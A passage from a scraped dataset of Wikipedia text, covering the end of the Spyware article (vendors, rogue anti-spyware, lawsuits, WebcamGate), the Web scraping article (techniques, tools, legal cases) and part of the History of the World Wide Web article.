spyware programs which may not be used by their creators. Programs may be grouped into "families" based not on shared program code, but on common behaviors, or by "following the money" of apparent financial or business connections. For instance, a number of the spyware programs distributed by Claria are collectively known as "Gator". Likewise, programs that are frequently installed together may be described as parts of the same spyware package, even if they function separately. Spyware vendors include NSO Group, which in the 2010s sold spyware to governments for spying on human rights activists and journalists. 41 42 43 NSO Group was investigated by Citizen Lab. 41 43 Malicious programmers have released a large number of rogue (fake) anti-spyware programs, and widely distributed Web banner ads can warn users that their computers have been infected with spyware, directing them to purchase programs which do not actually remove spyware—or else, may add more spyware of their own. 44 45 The recent update proliferation of fake or spoofed antivirus products that bill themselves as antispyware can be troublesome. Users may receive popups prompting them to install them to protect their computer, when it will in fact add spyware. It is recommended that users do not install any freeware claiming to be anti-spyware unless it is verified to be legitimate. Some known offenders include: Fake antivirus products constitute 15 percent of all malware. 47 On January 26, 2006, Microsoft and the Washington state attorney general filed suit against Secure Computer for its Spyware Cleaner product. 48 Unauthorized access to a computer is illegal under computer crime laws, such as the U.S. Computer Fraud and Abuse Act, the U.K.'s Computer Misuse Act, and similar laws in other countries. Since owners of computers infected with spyware generally claim that they never authorized the installation, a prima facie reading would suggest that the promulgation of spyware would count as a criminal act. Law enforcement has often pursued the authors of other malware, particularly viruses. However, few spyware developers have been prosecuted, and many operate openly as strictly legitimate businesses, though some have faced lawsuits. 49 50 Spyware producers argue that, contrary to the users' claims, users do in fact give consent to installations. Spyware that comes bundled with shareware applications may be described in the legalese text of an end-user license agreement (EULA). Many users habitually ignore these purported contracts, but spyware companies such as Claria say these demonstrate that users have consented. Despite the ubiquity of EULAs agreements, under which a single click can be taken as consent to the entire text, relatively little caselaw has resulted from their use. It has been established in most common law jurisdictions that this type of agreement can be a binding contract in certain circumstances. 51 This does not, however, mean that every such agreement is a contract, or that every term in one is enforceable. Some jurisdictions, including the U.S. states of Iowa 52 and Washington, 53 have passed laws criminalizing some forms of spyware. Such laws make it illegal for anyone other than the owner or operator of a computer to install software that alters Web-browser settings, monitors keystrokes, or disables computer-security software. In the United States, lawmakers introduced a bill in 2005 entitled the Internet Spyware Prevention Act, which would imprison creators of spyware. 54 The US Federal Trade Commission has sued Internet marketing organizations under the "unfairness doctrine" 55 to make them stop infecting consumers' PCs with spyware. In one case, that against Seismic Entertainment Productions, the FTC accused the defendants of developing a program that seized control of PCs nationwide, infected them with spyware and other malicious software, bombarded them with a barrage of pop-up advertising for Seismic's clients, exposed the PCs to security risks, and caused them to malfunction. Seismic then offered to sell the victims an "antispyware" program to fix the computers, and stop the popups and other problems that Seismic had caused. On November 21, 2006, a settlement was entered in federal court under which a $1.75 million judgment was imposed in one case and $1.86 million in another, but the defendants were insolvent 56 In a second case, brought against CyberSpy Software LLC, the FTC charged that CyberSpy marketed and sold "RemoteSpy" keylogger spyware to clients who would then secretly monitor unsuspecting consumers' computers. According to the FTC, Cyberspy touted RemoteSpy as a "100% undetectable" way to "Spy on Anyone. From Anywhere. The FTC has obtained a temporary order prohibiting the defendants from selling the software and disconnecting from the Internet any of their servers that collect, store, or provide access to information that this software has gathered. The case is still in its preliminary stages. A complaint filed by the Electronic Privacy Information Center (EPIC) brought the RemoteSpy software to the FTC's attention. 57 An administrative fine, the first of its kind in Europe, has been issued by the Independent Authority of Posts and Telecommunications (OPTA) from the Netherlands. It applied fines in total value of Euro 1,000,000 for infecting 22 million computers. The spyware concerned is called DollarRevenue. The law articles that have been violated are art. 4.1 of the Decision on universal service providers and on the interests of end users; the fines have been issued based on art. 15.4 taken together with art. 15.10 of the Dutch telecommunications law. 58 Former New York State Attorney General and former Governor of New York Eliot Spitzer has pursued spyware companies for fraudulent installation of software. 59 In a suit brought in 2005 by Spitzer, the California firm Intermix Media, Inc. ended up settling, by agreeing to pay US$7.5 million and to stop distributing spyware. 60 The hijacking of Web advertisements has also led to litigation. In June 2002, a number of large Web publishers sued Claria for replacing advertisements, but settled out of court. Courts have not yet had to decide whether advertisers can be held liable for spyware that displays their ads. In many cases, the companies whose advertisements appear in spyware pop-ups do not directly do business with the spyware firm. Rather, they have contracted with an advertising agency, which in turn contracts with an online subcontractor who gets paid by the number of "impressions" or appearances of the advertisement. Some major firms such as Dell Computer and Mercedes-Benz have sacked advertising agencies that have run their ads in spyware. 61 Litigation has gone both ways. Since "spyware" has become a common pejorative, some makers have filed libel and defamation actions when their products have been so described. In 2003, Gator (now known as Claria) filed suit against the website PC Pitstop for describing its program as "spyware". 62 PC Pitstop settled, agreeing not to use the word "spyware", but continues to describe harm caused by the Gator Claria software. 63 As a result, other anti-spyware and anti-virus companies have also used other terms such as "potentially unwanted programs" or greyware to denote these products. In the 2010 WebcamGate case, plaintiffs charged two suburban Philadelphia high schools secretly spied on students by surreptitiously and remotely activating webcams embedded in school-issued laptops the students were using at home, and therefore infringed on their privacy rights. The school loaded each student's computer with LANrev's remote activation tracking software. This included the now-discontinued "TheftTrack". While TheftTrack was not enabled by default on the software, the program allowed the school district to elect to activate it, and to choose which of the TheftTrack surveillance options the school wanted to enable. 64 TheftTrack allowed school district employees to secretly remotely activate the webcam embedded in the student's laptop, above the laptop's screen. That allowed school officials to secretly take photos through the webcam, of whatever was in front of it and in its line of sight, and send the photos to the school's server. The LANrev software disabled the webcams for all other uses (e.g., students were unable to use Photo Booth or video chat), so most students mistakenly believed their webcams did not work at all. On top of the webcam surveillance, TheftTrack allowed school officials to take screenshots and send them to the school's server. School officials were also granted the ability to take snapshots of instant messages, web browsing, music playlists, and written compositions. The schools admitted to secretly snapping over 66,000 webshots and screenshots, including webcam shots of students in their bedrooms. 64 65 66 |
140 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#bodyContent | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
141 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/History_of_the_World_Wide_Web | The World Wide Web ("WWW", "W3" or simply "the Web") is a global information medium that users can access via computers connected to the Internet. The term is often mistakenly used as a synonym for the Internet, but the Web is a service that operates over the Internet, just as email and Usenet do. The history of the Internet and the history of hypertext date back significantly further than that of the World Wide Web. Tim Berners-Lee invented the World Wide Web while working at CERN in 1989. He proposed a "universal linked information system" using several concepts and technologies, the most fundamental of which was the connections that existed between information. 1 2 He developed the first web server, the first web browser, and a document formatting protocol, called Hypertext Markup Language (HTML). After publishing the markup language in 1991, and releasing the browser source code for public use in 1993, many other web browsers were soon developed, with Marc Andreessen's Mosaic (later Netscape Navigator), being particularly easy to use and install, and often credited with sparking the Internet boom of the 1990s. It was a graphical browser which ran on several popular office and home computers, bringing multimedia content to non-technical users by including images and text on the same page. Websites for use by the general public began to emerge in 1993 94. This spurred competition in server and browser software, highlighted in the Browser wars which was initially dominated by Netscape Navigator and Internet Explorer. Following the complete removal of commercial restrictions on Internet use by 1995, commercialization of the Web amidst macroeconomic factors led to the dot-com boom and bust in the late 1990s and early 2000s. The features of HTML evolved over time, leading to HTML version 2 in 1995, HTML3 and HTML4 in 1997, and HTML5 in 2014. The language was extended with advanced formatting in Cascading Style Sheets (CSS) and with programming capability by JavaScript. AJAX programming delivered dynamic content to users, which sparked a new era in Web design, styled Web 2.0. The use of social media, becoming common-place in the 2010s, allowed users to compose multimedia content without programming skills, making the Web ubiquitous in every-day life. The underlying concept of hypertext as a user interface paradigm originated in projects in the 1960s, from research such as the Hypertext Editing System (HES) by Andries van Dam at Brown University, IBM Generalized Markup Language, Ted Nelson's Project Xanadu, and Douglas Engelbart's oN-Line System (NLS). 3 page needed non-primary source needed Both Nelson and Engelbart were in turn inspired by Vannevar Bush's microfilm-based memex, which was described in the 1945 essay "As We May Think". 4 title missing 5 Other precursors were FRESS and Intermedia. Paul Otlet's project Mundaneum has also been named as an early 20th-century precursor of the Web. In 1980, Tim Berners-Lee, at the European Organization for Nuclear Research (CERN) in Switzerland, built ENQUIRE, as a personal database of people and software models, but also as a way to experiment with hypertext; each new page of information in ENQUIRE had to be linked to another page. 6 7 When Berners-Lee built ENQUIRE, the ideas developed by Bush, Engelbart, and Nelson did not influence his work, since he was not aware of them. However, as Berners-Lee began to refine his ideas, the work of these predecessors would later help to confirm the legitimacy of his concept. 6 8 During the 1980s, many packet-switched data networks emerged based on various communication protocols (see Protocol Wars). One of these standards was the Internet protocol suite, which is often referred to as TCP IP. As the Internet grew through the 1980s, many people realized the increasing need to be able to find and organize files and use information. By 1985, the Domain Name System (upon which the Uniform Resource Locator is built) came into being. 9 better source needed failed verification Many small, self-contained hypertext systems were created, such as Apple Computer's HyperCard (1987). Berners-Lee's contract in 1980 was from June to December, but in 1984 he returned to CERN in a permanent role, and considered its problems of information management: physicists from around the world needed to share data, yet they lacked common machines and any shared presentation software. Shortly after Berners-Lee's return to CERN, TCP IP protocols were installed on Unix machines at the institution, turning it into the largest Internet site in Europe. In 1988, the first direct IP connection between Europe and North America was established and Berners-Lee began to openly discuss the possibility of a web-like system at CERN. 10 He was inspired by a book, Enquire Within upon Everything. Many online services existed before the creation of the World Wide Web, such as for example CompuServe and bulletin board systems. 11 While working at CERN, Tim Berners-Lee became frustrated with the inefficiencies and difficulties posed by finding information stored on different computers. 12 On 12 March 1989, he submitted a memorandum, titled "Information Management: A Proposal", 1 13 to the management at CERN. The proposal used the term "web" and was based on "a large hypertext database with typed links". It described a system called "Mesh" that referenced ENQUIRE, the database and software project he had built in 1980, with a more elaborate information management system based on links embedded as text: "Imagine, then, the references in this document all being associated with the network address of the thing to which they referred, so that while reading this document, you could skip to them with a click of the mouse. Such a system, he explained, could be referred to using one of the existing meanings of the word hypertext, a term that he says was coined in the 1950s. Berners-Lee notes the possibility of multimedia documents that include graphics, speech and video, which he terms hypermedia. 1 2 Although the proposal attracted little interest, Berners-Lee was encouraged by his manager, Mike Sendall, to begin implementing his system on a newly acquired NeXT workstation. He considered several names, including Information Mesh, The Information Mine or Mine of Information, but settled on World Wide Web. Berners-Lee found an enthusiastic supporter in his colleague and fellow hypertext enthusiast Robert Cailliau who began to promote the proposed system throughout CERN. Berners-Lee and Cailliau pitched Berners-Lee's ideas to the European Conference on Hypertext Technology in September 1990, but found no vendors who could appreciate his vision. Berners-Lee's breakthrough was to marry hypertext to the Internet. In his book Weaving The Web, he explains that he had repeatedly suggested to members of both technical communities that a marriage between the two technologies was possible. But, when no one took up his invitation, he finally assumed the project himself. In the process, he developed three essential technologies: With help from Cailliau he published a more formal proposal on 12 November 1990 to build a "hypertext project" called World Wide Web (abbreviated "W3") as a "web" of "hypertext documents" to be viewed by "browsers" using a client server architecture. 15 16 The proposal was modelled after the Standard Generalized Markup Language (SGML) reader Dynatext by Electronic Book Technology, a spin-off from the Institute for Research in Information and Scholarship at Brown University. The Dynatext system, licensed by CERN, was considered too expensive and had an inappropriate licensing policy for use in the general high energy physics community, namely a fee for each document and each document alteration. citation needed At this point HTML and HTTP had already been in development for about two months and the first web server was about a month from completing its first successful test. Berners-Lee's proposal estimated that a read-only Web would be developed within three months and that it would take six months to achieve "the creation of new links and new material by readers, so that authorship becomes universal" as well as "the automatic notification of a reader when new material of interest to him her has become available". By December 1990, Berners-Lee and his work team had built all the tools necessary for a working Web: the HyperText Transfer Protocol (HTTP), the HyperText Markup Language (HTML), the first web browser (named WorldWideWeb, which was also a web editor), the first web server (later known as CERN httpd) and the first web site (http: info.cern.ch) containing the first web pages that described the project itself was published on 20 December 1990. 17 18 The browser could access Usenet newsgroups and FTP files as well. A NeXT Computer was used by Berners-Lee as the web server and also to write the web browser. 19 Working with Berners-Lee at CERN, Nicola Pellow developed the first cross-platform web browser, the Line Mode Browser. 20 In January 1991, the first web servers outside CERN were switched on. On 6 August 1991, Berners-Lee published a short summary of the World Wide Web project on the newsgroup alt.hypertext, inviting collaborators. 21 Paul Kunz from the Stanford Linear Accelerator Center (SLAC) visited CERN in September 1991, and was captivated by the Web. He brought the NeXT software back to SLAC, where librarian Louise Addis adapted it for the VM CMS operating system on the IBM mainframe as a way to host the SPIRES-HEP database and display SLAC's catalog of online documents. 22 23 24 25 This was the first web server outside of Europe and the first in North America. 26 The World Wide Web had several differences from other hypertext systems available at the time. The Web required only unidirectional links rather than bidirectional ones, making it possible for someone to link to another resource without action by the owner of that resource. It also significantly reduced the difficulty of implementing web servers and browsers (in comparison to earlier systems), but in turn, presented the chronic problem of link rot. The WorldWideWeb browser only ran on NeXTSTEP operating system. This shortcoming was discussed in January 1992, 27 and alleviated in April 1992 by the release of Erwise, an application developed at the Helsinki University of Technology, and in May by ViolaWWW, created by Pei-Yuan Wei, which included advanced features such as embedded graphics, scripting, and animation. ViolaWWW was originally an application for HyperCard. 28 Both programs ran on the X Window System for Unix. In 1992, the first tests between browsers on different platforms were concluded successfully between buildings 513 and 31 in CERN, between browsers on the NexT station and the X11 ported Mosaic browser. ViolaWWW became the recommended browser at CERN. To encourage use within CERN, Bernd Pollermann put the CERN telephone directory on the web—previously users had to log onto the mainframe in order to look up phone numbers. The Web was successful at CERN and spread to other scientific and academic institutions. Students at the University of Kansas adapted an existing text-only hypertext browser, Lynx, to access the web in 1992. Lynx was available on Unix and DOS, and some web designers, unimpressed with glossy graphical websites, held that a website not accessible through Lynx was not worth visiting. In these earliest browsers, images opened in a separate "helper" application. In the early 1990s, Internet-based projects such as Archie, Gopher, Wide Area Information Servers (WAIS), and the FTP Archive list attempted to create ways to organize distributed data. Gopher was a document browsing system for the Internet, released in 1991 by the University of Minnesota. Invented by Mark P. McCahill, it became the first commonly used hypertext interface to the Internet. While Gopher menu items were examples of hypertext, they were not commonly perceived in that way clarification needed . In less than a year, there were hundreds of Gopher servers. 29 It offered a viable alternative to the World Wide Web in the early 1990s and the consensus was that Gopher would be the primary way that people would interact with the Internet. 30 31 However, in 1993, the University of Minnesota declared that Gopher was proprietary and would have to be licensed. 29 In response, on 30 April 1993, CERN announced that the World Wide Web would be free to anyone, with no fees due, and released their code into the public domain. 32 This made it possible to develop servers and clients independently and to add extensions without licensing restrictions. citation needed Coming two months after the announcement that the server implementation of the Gopher protocol was no longer free to use, this spurred the development of various browsers which precipitated a rapid shift away from Gopher. 33 By releasing Berners-Lee's invention for public use, CERN encouraged and enabled its widespread use. 34 Early websites intermingled links for both the HTTP web protocol and the Gopher protocol, which provided access to content through hypertext menus presented as a file system rather than through HTML files. Early Web users would navigate either by bookmarking popular directory pages or by consulting updated lists such as the NCSA "What's New" page. Some sites were also indexed by WAIS, enabling users to submit full-text searches similar to the capability later provided by search engines. After 1993 the World Wide Web saw many advances to indexing and ease of access through search engines, which often neglected Gopher and Gopherspace. As its popularity increased through ease of use, incentives for commercial investment in the Web also grew. By the middle of 1994, the Web was outcompeting Gopher and the other browsing systems for the Internet. 35 The National Center for Supercomputing Applications (NCSA) at the University of Illinois at Urbana Champaign (UIUC) established a website in November 1992. After Marc Andreessen, a student at UIUC, was shown ViolaWWW in late 1992, 28 he began work on Mosaic with another UIUC student Eric Bina, using funding from the High-Performance Computing and Communications Initiative, a US-federal research and development program initiated by US Senator Al Gore. 36 37 38 Andreessen and Bina released a Unix version of the browser in February 1993; Mac and Windows versions followed in August 1993. The browser gained popularity due to its strong support of integrated multimedia, and the authors' rapid response to user bug reports and recommendations for new features. 28 Historians generally agree that the 1993 introduction of the Mosaic web browser was a turning point for the World Wide Web. 39 40 41 Before the release of Mosaic in 1993, graphics were not commonly mixed with text in web pages, and the Web was less popular than older protocols such as Gopher and WAIS. Mosaic could display inline images 42 and submit forms 43 44 for Windows, Macintosh and X-Windows. NCSA also developed HTTPd, a Unix web server that used the Common Gateway Interface to process forms and Server Side Includes for dynamic content. Both the client and server were free to use with no restrictions. 45 Mosaic was an immediate hit; 46 its graphical user interface allowed the Web to become by far the most popular protocol on the Internet. Within a year, web traffic surpassed Gopher's. 29 Wired declared that Mosaic made non-Internet online services obsolete, 47 and the Web became the preferred interface for accessing the Internet. citation needed The World Wide Web enabled the spread of information over the Internet through an easy-to-use and flexible format. It thus played an important role in popularising use of the Internet. 48 Although the two terms are sometimes conflated in popular use, World Wide Web is not synonymous with Internet. 49 The Web is an information space containing hyperlinked documents and other resources, identified by their URIs. 50 It is implemented as both client and server software using Internet protocols such as TCP IP and HTTP. In keeping with its origins at CERN, early adopters of the Web were primarily university-based scientific departments or physics laboratories such as SLAC and Fermilab. By January 1993 there were fifty web servers across the world. 51 By October 1993 there were over five hundred servers online, including some notable websites. 52 Practical media distribution and streaming media over the Web was made possible by advances in data compression, due to the impractically high bandwidth requirements of uncompressed media. Following the introduction of the Web, several media formats based on discrete cosine transform (DCT) were introduced for practical media distribution and streaming over the Web, including the MPEG video format in 1991 and the JPEG image format in 1992. The high level of image compression made JPEG a good format for compensating slow Internet access speeds, typical in the age of dial-up Internet access. JPEG became the most widely used image format for the World Wide Web. A DCT variation, the modified discrete cosine transform (MDCT) algorithm, led to the development of MP3, which was introduced in 1991 and became the first popular audio format on the Web. In 1992 the Computing and Networking Department of CERN, headed by David Williams, withdrew support of Berners-Lee's work. A two-page email sent by Williams stated that the work of Berners-Lee, with the goal of creating a facility to exchange information such as results and comments from CERN experiments to the scientific community, was not the core activity of CERN and was a misallocation of CERN's IT resources. Following this decision, Tim Berners-Lee left CERN for the Massachusetts Institute of Technology (MIT), where he continued to develop HTTP. citation needed The first Microsoft Windows browser was Cello, written by Thomas R. Bruce for the Legal Information Institute at Cornell Law School to provide legal information, since access to Windows was more widespread amongst lawyers than access to Unix. Cello was released in June 1993. The rate of web site deployment increased sharply around the world, and fostered development of international standards for protocols and content formatting. 53 Berners-Lee continued to stay involved in guiding web standards, such as the markup languages to compose web pages, and he advocated his vision of a Semantic Web (sometimes known as Web 3.0) based around machine-readability and interoperability standards. In May 1994, the first International WWW Conference, organized by Robert Cailliau, was held at CERN; the conference has been held every year since. The World Wide Web Consortium (W3C) was founded by Tim Berners-Lee after he left the European Organization for Nuclear Research (CERN) in September October 1994 in order to create open standards for the Web. 54 It was founded at the Massachusetts Institute of Technology Laboratory for Computer Science (MIT LCS) with support from the Defense Advanced Research Projects Agency (DARPA), which had pioneered the Internet. A year later, a second site was founded at INRIA (a French national computer research lab) with support from the European Commission; and in 1996, a third continental site was created in Japan at Keio University. W3C comprised various companies that were willing to create standards and recommendations to improve the quality of the Web. Berners-Lee made the Web available freely, with no patent and no royalties due. The W3C decided that its standards must be based on royalty-free technology, so they can be easily adopted by anyone. Netscape and Microsoft, in the middle of a browser war, ignored the W3C and added elements to HTML ad hoc (e.g., blink and marquee). Finally, in 1995, Netscape and Microsoft came to their senses and agreed to abide by the W3C's standard. 55 The W3C published the standard for HTML 4 in 1997, which included Cascading Style Sheets (CSS), giving designers more control over the appearance of web pages without the need for additional HTML tags. The W3C could not enforce compliance so none of the browsers were fully compliant. This 